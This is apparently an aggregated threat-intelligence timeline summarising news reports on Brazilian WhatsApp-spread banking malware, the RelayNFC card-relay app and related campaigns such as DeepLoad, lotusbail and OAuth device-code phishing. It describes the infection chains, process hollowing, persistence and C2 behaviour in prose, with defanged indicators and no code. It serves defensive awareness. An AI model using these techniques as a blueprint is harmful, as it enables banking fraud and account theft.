- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The malware uses an obfuscated Visual Basic Script, which drops a batch script that delivers two payloads: a Python script for WhatsApp Web-based dissemination and an MSI installer for Eternidade Stealer.
First reported: 19.11.2025 17:35 · 1 source, 2 articles. Sources:
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The Python script establishes communication with a remote server and uses WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp.
First reported: 19.11.2025 17:35 · 1 source, 2 articles. Sources:
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The malware harvests a victim's entire contact list, filtering out groups, business contacts, and broadcast lists, and sends a malicious attachment to all contacts.
First reported: 19.11.2025 17:35 · 1 source, 2 articles. Sources:
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The MSI installer drops several payloads, including an AutoIt script that checks if the compromised system is based in Brazil by inspecting the operating system language.
First reported: 19.11.2025 17:35 · 1 source, 2 articles. Sources:
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The script scans running processes and registry keys to ascertain the presence of installed security products and profiles the machine, sending details to a C2 server.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
The malware injects the Eternidade Stealer payload into 'svchost.exe' using process hollowing.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
Eternidade Stealer continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
The malware uses a terra.com[.]br email address to fetch C2 details, mirroring a tactic recently adopted by Water Saci.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
The campaign's backend was traced to two panels: one for managing the Redirector System and a second, login-protected panel used to monitor infected hosts.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
The threat actor Water Saci is using a sophisticated, highly layered infection chain that uses HTML Application (HTA) files and PDFs to propagate a worm that deploys a banking trojan via WhatsApp in attacks targeting users in Brazil.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The latest wave is characterized by the attackers shifting from PowerShell to a Python-based variant that spreads the malware in a worm-like manner over WhatsApp Web.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The PDF lure instructs victims to update Adobe Reader by clicking on an embedded link.
First reported: 03.12.2025 17:32 (1 source, 1 article)
Users who receive HTA files are deceived into executing a Visual Basic Script immediately upon opening, which then runs PowerShell commands to fetch two next-stage payloads from a remote server: an MSI installer for the trojan and a Python script responsible for spreading the malware via WhatsApp Web.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The MSI installer serves as a conduit for delivering the banking trojan using an AutoIt script. The script also runs checks to ensure that only one instance of the trojan is running at any given time.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The script verifies the presence of a marker file named "executed.dat." If it does not exist, the script creates the file and notifies an attacker-controlled server ("manoelimoveiscaioba[.]com").
First reported: 03.12.2025 17:32 (1 source, 1 article)
The script analyzes the user's Google Chrome browsing history to search for visits to banking websites, specifically a hard-coded list comprising Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The script then proceeds to another critical reconnaissance step that involves checking for installed antivirus and security software, as well as harvesting detailed system metadata.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The main functionality of the malware is to monitor open windows and extract their window titles to compare them against a list of banks, payment platforms, exchanges, and cryptocurrency wallets.
First reported: 03.12.2025 17:32 (1 source, 1 article)
If any of these window titles contain keywords related to targeted entities, the script looks for a TDA file dropped by the installer, decrypts it, and injects it into a hollowed "svchost.exe" process; the loader then searches for an additional DMP file containing the banking trojan.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The banking trojan deployed is not Maverick, but rather a malware that exhibits structural and behavioral continuity with Casbaneiro.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The trojan carries out "aggressive" anti-virtualization checks to sidestep analysis and detection, and gathers host information through Windows Management Instrumentation (WMI) queries.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The trojan makes Registry modifications to set up persistence and establishes contact with a C2 server ("serverseistemasatu[.]com") to send the collected details and receive backdoor commands that grant remote control over the infected system.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The trojan forcibly terminates several browsers to force victims to reopen banking sites under "attacker-controlled conditions."
First reported: 03.12.2025 17:32 (1 source, 1 article)
The second aspect of the campaign is the use of a Python script, an enhanced version of its PowerShell predecessor, that delivers the malware to every contact through the victim's WhatsApp Web session using the Selenium browser automation tool.
First reported: 03.12.2025 17:32 (1 source, 1 article)
There is "compelling" evidence to suggest that Water Saci may have used a large language model (LLM) or code-translation tool to port their propagation script from PowerShell to Python, given the functional similarities between the two versions and the inclusion of emojis in console output.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The development comes as Brazilian banking users are also being targeted by a previously undocumented Android malware dubbed RelayNFC that's designed to carry out Near-Field Communication (NFC) relay attacks and siphon contactless payment data.
First reported: 03.12.2025 17:32 (1 source, 1 article)
RelayNFC implements a full real-time APDU relay channel, allowing attackers to complete transactions as though the victim's card were physically present.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The malware is built using React Native and Hermes bytecode, which complicates static analysis and helps evade detection.
First reported: 03.12.2025 17:32 (1 source, 1 article)
Primarily spread via phishing, the attack makes use of decoy Portuguese-language sites (e.g., "maisseguraca[.]site") to trick users into installing the malware under the pretext of securing their payment cards.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The end goal of the campaign is to capture the victim's card details and relay them to attackers, who can then perform fraudulent transactions using the stolen data.
First reported: 03.12.2025 17:32 (1 source, 1 article)
The cybersecurity company said its investigation also uncovered a separate phishing site ("test.ikotech[.]online") that distributes an APK file with a partial implementation of Host Card Emulation (HCE), indicating that the threat actors are experimenting with different NFC relay techniques.
First reported: 03.12.2025 17:32 (1 source, 1 article)
TCLBanker targets 59 banking, fintech, and cryptocurrency platforms via a trojanized MSI installer for Logitech AI Prompt Builder.
First reported: 08.05.2026 01:06 (1 source, 1 article)
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
Similar Happenings
WhatsApp-delivered VBS malware abuses UAC bypass for persistent Windows compromise via cloud-hosted MSI payloads
A malware campaign observed since late February 2026 delivers malicious Visual Basic Script (VBS) files to Windows users via WhatsApp, executing multi-stage attacks to establish persistence and enable remote access. The attack chain uses renamed legitimate Windows utilities (e.g., curl.exe → netapi.dll, bitsadmin.exe → sc.exe) to evade detection, retrieves payloads from trusted cloud services (AWS S3, Tencent Cloud, Backblaze B2), and installs unsigned MSI packages. The malware weakens User Account Control (UAC) defenses by repeatedly attempting elevated cmd.exe execution, modifies registry keys under HKLM\Software\Microsoft\Win, and embeds persistence to survive reboots. This enables privilege escalation without user interaction and the deployment of remote access tools such as AnyDesk, facilitating data theft and secondary malware delivery.
DeepLoad malware campaign leverages AI-generated obfuscation and ClickFix for persistent credential theft
A malicious campaign named DeepLoad is actively targeting enterprise networks to steal user credentials and maintain persistent access. The malware combines social engineering via ClickFix to trick users into executing PowerShell commands through the Windows Run dialog, using compromised websites or SEO-poisoned search results for delivery. DeepLoad hides its functional payload within layers of AI-generated obfuscation code consisting of meaningless variable assignments, evading file-based detection. It leverages the Windows lock screen process 'LockAppHost.exe' and abuses Windows Management Instrumentation (WMI) to achieve persistence, automatically re-infecting systems three days after initial removal without additional user or attacker action. The campaign spreads via USB drives within minutes of infection, deploying decoy shortcut files such as 'ChromeSetup.lnk' and 'Firefox Installer.lnk' to enable lateral movement. DeepLoad deploys a standalone credential stealer ('filemanager.exe') that exfiltrates stored browser passwords and a malicious browser extension that intercepts keystrokes in real time during login sessions. The impact includes unauthorized access to enterprise accounts, potential data exfiltration, and a sustained foothold in compromised networks despite apparent cleanup efforts.
PluggyApe Backdoor Targets Ukraine's Defense Forces in Charity-Themed Campaign
Ukraine's Defense Forces were targeted in a charity-themed malware campaign between October and December 2025, delivering the PluggyApe backdoor, likely deployed by the Russian threat group Void Blizzard (Laundry Bear). The attacks began with instant messages over Signal or WhatsApp, directing recipients to malicious websites posing as charitable foundations. These sites distributed password-protected archives containing PluggyApe payloads. The malware profiles the host, sends victim information to attackers, and waits for further commands. In February 2026, a new campaign targeting Ukrainian entities was observed, employing judicial and charity-themed lures to deploy a JavaScript-based backdoor codenamed DRILLAPP. This campaign is likely orchestrated by threat actors linked to Russia and shares overlaps with the prior PluggyApe campaign. The malware is capable of uploading and downloading files, leveraging the microphone, and capturing images through the webcam. The threat actor is believed to be active since at least April 2024.
Malicious npm package 'lotusbail' steals WhatsApp credentials and messages
A malicious npm package named 'lotusbail' has been discovered that poses as a legitimate WhatsApp Web API library. The package steals WhatsApp authentication tokens and session keys, intercepts messages, and exfiltrates contact lists and media files. It has been available for at least six months with over 56,000 downloads. The package also links the attacker's device to the victim's WhatsApp account, granting persistent access even after the package is removed. Researchers recommend checking for rogue linked devices and monitoring runtime behavior for unexpected outbound connections. The package was uploaded by a user named 'seiren_primrose' in May 2025 and has been downloaded 711 times in the last week. It uses a malicious WebSocket wrapper to capture credentials and chats, and the stolen data is transmitted to an attacker-controlled URL in encrypted form. The package also uses a hard-coded pairing code to hijack the device-linking process and enters an infinite loop when debugging tools are detected.
OAuth Device Code Phishing Campaigns Target Microsoft 365 Accounts
A surge in phishing campaigns exploiting Microsoft’s OAuth device code authorization flow has been observed, targeting Microsoft 365 accounts. Both state-aligned and financially motivated actors are using social engineering to trick users into approving malicious applications, leading to account takeover and data theft. The attacks leverage the OAuth 2.0 device authorization grant, a legitimate process designed for devices with limited input capabilities. Once victims enter a device code generated by an attacker-controlled application, the threat actor receives a valid access token, granting control over the compromised account. The campaigns use QR codes, embedded buttons, and hyperlinked text to initiate the attack chain, often claiming to involve document sharing, token reauthorization, or security verification. The growth of these campaigns is linked to readily available phishing tools like SquarePhish2 and Graphish, which simplify device code abuse and require limited technical skill. Proofpoint observed financially motivated actor TA2723 and Russia-linked group UNK_AcademicFlare adopting this technique, targeting various sectors in the US and Europe. Microsoft recently warned of phishing campaigns using OAuth URL redirection mechanisms to bypass conventional phishing defenses. These campaigns target government and public-sector organizations, redirecting victims to attacker-controlled infrastructure without stealing their tokens. Attackers abuse OAuth's standard behavior by crafting URLs with manipulated parameters or associated malicious applications to redirect users to malicious destinations. The attack starts with a malicious application created by the threat actor, configured with a redirect URL pointing to a rogue domain hosting malware. The malicious payloads are distributed as ZIP archives, leading to PowerShell execution, DLL side-loading, and pre-ransom or hands-on-keyboard activity. 
The activity, ongoing since September 2025, is being tracked by Proofpoint under the moniker UNK_AcademicFlare. The attacks use compromised email addresses belonging to government and military organizations to strike entities within the government, think tank, higher education, and transportation sectors in the U.S. and Europe. The adversary claims to share a link to a document that includes questions or topics for the email recipient to review before a meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender's Microsoft OneDrive account and instructs the victim to copy the provided code and click 'Next' to access the supposed document. Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, which attributed the use of the technique to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish. To counter the risk posed by device code phishing, the best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users. If that is not feasible, it is advised to use a policy with an allow-list approach that permits device code authentication only for approved users, operating systems, or IP ranges. Threat actors are now targeting technology, manufacturing, and financial organizations in campaigns that combine device code phishing and voice phishing (vishing) to abuse the OAuth 2.0 Device Authorization flow and compromise Microsoft Entra accounts. Unlike previous attacks that used malicious OAuth applications to compromise accounts, these campaigns instead leverage legitimate Microsoft OAuth client IDs and the device authorization flow to trick victims into authenticating.
This provides attackers with valid authentication tokens that can be used to access the victim's account without relying on regular phishing sites that steal passwords or intercept multi-factor authentication codes. Hackers are abusing the legitimate OAuth redirection mechanism to bypass phishing protections in email and browsers to take users to malicious pages. The attacks target government and public-sector organizations with phishing links that prompt users to authenticate to a malicious application. The malicious OAuth applications are registered with an identity provider, such as Microsoft Entra ID, and leverage the OAuth 2.0 protocol to obtain delegated or application-level access to user data and resources. The attackers create malicious OAuth applications in a tenant they control and configure them with a redirect URI pointing to their infrastructure. The researchers say that even if the URLs for Entra ID look like legitimate authorization requests, the endpoint is invoked with parameters for silent authentication without an interactive login and an invalid scope that triggers authentication errors. This forces the identity provider to redirect users to the redirect URI configured by the attacker. In some cases, the victims are redirected to phishing pages powered by attacker-in-the-middle frameworks such as EvilProxy, which can intercept valid session cookies to bypass multi-factor authentication (MFA) protections. Microsoft found that the 'state' parameter was misused to auto-fill the victim’s email address in the credentials box on the phishing page, increasing the perceived sense of legitimacy. In other instances, the victims are redirected to a 'download' path that automatically delivers a ZIP file with malicious shortcut (.LNK) files and HTML smuggling tools. Opening the .LNK launches PowerShell, which performs reconnaissance on the compromised host and extracts the components required for the next step, DLL side-loading. 
A malicious DLL (crashhandler.dll) decrypts and loads the final payload (crashlog.dat) into memory, while a legitimate executable (stream_monitor.exe) loads a decoy to distract the victim. Microsoft suggests that organizations should tighten permissions for OAuth applications, enforce strong identity protections and Conditional Access policies, and use cross-domain detection across email, identity, and endpoints.